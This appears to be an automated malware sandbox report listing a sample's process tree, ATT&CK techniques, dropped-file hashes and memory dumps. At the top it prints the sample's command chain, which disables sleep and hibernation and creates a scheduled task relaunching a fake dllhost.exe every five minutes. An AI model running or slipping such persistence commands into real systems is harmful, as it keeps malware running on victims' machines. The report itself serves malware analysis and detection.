  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo вfэккSQicР & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Ъ6WlhГ
  2⤵
  PID:4196
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /hibernate off
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:600
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
346B

MD5
7cd54a5ac8dd28cdf11218402e9bd701

SHA1
3a869c67c6a31e6186addf3e45d6638953c1670a

SHA256
5de14e8d90dfe5f81ffe5c0d80958ae5c2fb691b6fe88e8a085d9b7b69be57f7

SHA512
bef716dd874f1c17a8b6eed4aa770e7743f7c35ab6635d672dd51a4c6c641beed44f361ea982075c952f18960de9d39313ac789bc3869fb9f73132f74c3d777f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
101343244d619fd29dc007b34351865b

SHA1
a721bf0ee99f24b3e6c263033cfa02a63d4175cc

SHA256
286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043

SHA512
1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
101343244d619fd29dc007b34351865b

SHA1
a721bf0ee99f24b3e6c263033cfa02a63d4175cc

SHA256
286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043

SHA512
1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
71f1cd7681a0b887f835e3aadeea7767

SHA1
f784f0ff4b999ddfa59633e592aba8736763bf50

SHA256
f01aec7092ba6bdab328a091b414002487ae38c51df0917ffe57bc1254d11a42

SHA512
450d9ac3236ce36625d0a6585f9ee0bf430c2899f77211ba79d1dd23c070d9323d3a2c91673d44988f896e1b549d839f147148ac474cad9111714cf98cd56064

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5f7c156669e5bf6052c1b52079de7f42

SHA1
1e0a396a8f14ed59bae444dd6ca83d51c567183d

SHA256
c0efd8aa9856d5400d3549a86c9b0790ab3afb503986120d21d10919eab6c3a1

SHA512
123ee57b614dc120f3b67a49d6ea886edb30e23b1b5a90eb7826bd0d106bef0d36ebfe1ff14fa6b583d201f5c06a0245e5c49701cd16d05e193bf16cdfa267d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5264ffdcbdd1a161fb54b8ec8f97a6e0

SHA1
d7fcd2b6e083fdcde03ffd3787ff130278671341

SHA256
c1f4a7989a3db4685ed3a42e80092b9bcf489b93c1cf02682c21dfb0778b67fa

SHA512
01876e921b2820dd4a72dadbb65dc6567eff2d840a72bef1f8852e0ca7128630ee62ab2723e5586a0a47d63c45ef31d56a38834c8b7c5d99dc891928f2774639

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5264ffdcbdd1a161fb54b8ec8f97a6e0

SHA1
d7fcd2b6e083fdcde03ffd3787ff130278671341

SHA256
c1f4a7989a3db4685ed3a42e80092b9bcf489b93c1cf02682c21dfb0778b67fa

SHA512
01876e921b2820dd4a72dadbb65dc6567eff2d840a72bef1f8852e0ca7128630ee62ab2723e5586a0a47d63c45ef31d56a38834c8b7c5d99dc891928f2774639

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
79b1c8f31c204780a7d48395091902fb

SHA1
e426358c0b3b6fa09ee47076506bc80c20f02706

SHA256
65ffbc05d68fec11f9a17f029c06ac8f2070dc6536a56bcda5cb80686e6008fb

SHA512
0739f74f16b89aebf87096079d53d36356fbf9fb43d5b86912c6d5b5d807d436f88fb3524fcca5a7522c37084226a8f3e265c051c01e84d3ff76f761d4508385

Download Submit
memory/328-680-0x0000000000490000-0x00000000004A6000-memory.dmp

Filesize
88KB

Download
memory/1268-1189-0x00000000087E0000-0x000000000882B000-memory.dmp

Filesize
300KB

Download
memory/1268-1179-0x0000000007E80000-0x00000000081D0000-memory.dmp

Filesize
3.3MB

Download
memory/2036-187-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2036-188-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2036-189-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2212-1297-0x0000000009B30000-0x0000000009BD5000-memory.dmp

Filesize
660KB

Download
memory/2536-154-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-138-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-159-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-160-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-161-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-162-0x0000000000ED0000-0x0000000001828000-memory.dmp

Filesize
9.3MB

Download
memory/2536-163-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-164-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-165-0x0000000009CE0000-0x000000000A1DE000-memory.dmp

Filesize
5.0MB

Download
memory/2536-166-0x00000000098E0000-0x0000000009972000-memory.dmp

Filesize
584KB

Download
memory/2536-167-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-168-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-169-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-170-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-171-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-172-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-173-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-174-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-175-0x00000000097B0000-0x00000000097BA000-memory.dmp

Filesize
40KB

Download
memory/2536-176-0x0000000009A70000-0x0000000009AD6000-memory.dmp

Filesize
408KB

Download
memory/2536-177-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-178-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-179-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-180-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-181-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-182-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-183-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-184-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-185-0x0000000000ED0000-0x0000000001828000-memory.dmp

Filesize
9.3MB

Download
memory/2536-157-0x00000000FEAF0000-0x00000000FEEC1000-memory.dmp

Filesize
3.8MB

Download
memory/2536-156-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-155-0x0000000000ED0000-0x0000000000ED2000-memory.dmp

Filesize
8KB

Download
memory/2536-117-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-118-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-119-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-120-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-121-0x0000000000ED0000-0x0000000001828000-memory.dmp

Filesize
9.3MB

Download
memory/2536-122-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-123-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-125-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-124-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-126-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-127-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-128-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-129-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-130-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-131-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-1407-0x0000000000ED0000-0x0000000001828000-memory.dmp

Filesize
9.3MB

Download
memory/2536-153-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-152-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-132-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-133-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-134-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-135-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-136-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-137-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-151-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-150-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-158-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-140-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-139-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-141-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-142-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-143-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-144-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-145-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-146-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-147-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-148-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/2536-149-0x0000000077580000-0x000000007770E000-memory.dmp

Filesize
1.6MB

Download
memory/3644-257-0x0000000007A00000-0x0000000007A1C000-memory.dmp

Filesize
112KB

Download
memory/3644-311-0x00000000092C0000-0x0000000009365000-memory.dmp

Filesize
660KB

Download
memory/3644-254-0x0000000007B20000-0x0000000007E70000-memory.dmp

Filesize
3.3MB

Download
memory/3644-253-0x00000000077D0000-0x0000000007836000-memory.dmp

Filesize
408KB

Download
memory/3644-258-0x00000000083C0000-0x000000000840B000-memory.dmp

Filesize
300KB

Download
memory/3644-268-0x0000000008130000-0x00000000081A6000-memory.dmp

Filesize
472KB

Download
memory/3644-301-0x0000000009260000-0x0000000009293000-memory.dmp

Filesize
204KB

Download
memory/3644-228-0x0000000004A00000-0x0000000004A36000-memory.dmp

Filesize
216KB

Download
memory/3644-302-0x00000000092A0000-0x00000000092BE000-memory.dmp

Filesize
120KB

Download
memory/3644-233-0x00000000070C0000-0x00000000076E8000-memory.dmp

Filesize
6.2MB

Download
memory/3644-315-0x0000000009580000-0x0000000009614000-memory.dmp

Filesize
592KB

Download
memory/3644-518-0x0000000006D30000-0x0000000006D4A000-memory.dmp

Filesize
104KB

Download
memory/3644-523-0x0000000006D20000-0x0000000006D28000-memory.dmp

Filesize
32KB

Download
memory/3644-251-0x0000000007730000-0x0000000007752000-memory.dmp

Filesize
136KB

Download